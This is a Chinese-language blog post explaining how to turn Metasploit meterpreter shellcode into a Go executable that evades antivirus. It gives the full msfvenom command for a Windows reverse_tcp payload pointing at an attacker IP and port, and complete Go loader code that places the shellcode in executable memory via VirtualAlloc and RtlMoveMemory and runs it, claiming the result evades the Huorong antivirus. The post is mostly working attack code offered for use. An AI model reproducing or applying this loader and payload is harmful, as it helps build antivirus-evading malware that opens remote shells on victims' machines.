使用msf生成shellcode并用Go免杀?
2024-10-21 03:18:33
msf生成的裸马现在已经不行了,加壳也只能加冷门壳了,VMP,Shielden,upx不是失效就是效果很差,所以当下,得用shellcode来免杀了
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.bin
在kali的控制台里输入以上命令,即在当前目录下生成一个bin文件,这个bin文件就是我们的shellcode了。
将1.bin拖到windows里,用winhex打开
点击编辑-复制所有-十六进制数值,然后新建一个1.go,在里面输入:
package main
import (
"encoding/hex"
"syscall"
"unsafe"
)
func main(){
sa := "复制结果粘贴进来"
shellcode, _ := hex.DecodeString(sa)
VirtualAlloc := syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc")
copyMem := syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory")
addr, _, _ := VirtualAlloc.Call(0,uintptr(len(shellcode)), 0x1000|0x2000, 0x40)
copyMem.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
syscall.Syscall(addr, 0, 0, 0, 0)
}
将“复制结果粘贴进来”替换成刚刚复制的十六进制数值,然后打开控制台,输入set GOARCH=386 //因为shellcode是32位的
回车,然后在输入go build 1.go
上述只是一个简单的shellcode加载器,能达到免杀火绒的效果,其他杀软并未测试,大佬勿喷
最新文章
- nginx 反代理google
- js 的一点用法
- JSONArray遍历
- MFC编程入门之前言
- JS作用域和预编译(转载 学习中。。。)
- [iOS]SourceTree+oschina实现代码远程托管
- Eclipse对svn操作切换账号或更换svn地址方法
- android驱动[置顶] 我的DIY Android之旅--驱动并控制你的Android开发板蜂鸣器
- 插入标记 方法 insertAdjacentHTML
- XML文件生成
- bzoj 1935: [Shoi2007]Tree 园丁的烦恼
- C语言之linux内核实现平方根计算算法
- 在Docker中体验数据库之MySql
- Window下,利用Anaconda2创建jupyter-notebook的python3环境方法
- fiddler 使用方法汇总
- hdu4753 Fishhead’s Little Game 状态压缩,总和一定的博弈
- java 多线程之 线程优先级和守护线程
- VBA 编写类
- php Pthread 多线程 (三) Mutex 互斥量
- c++ 向main传递参赛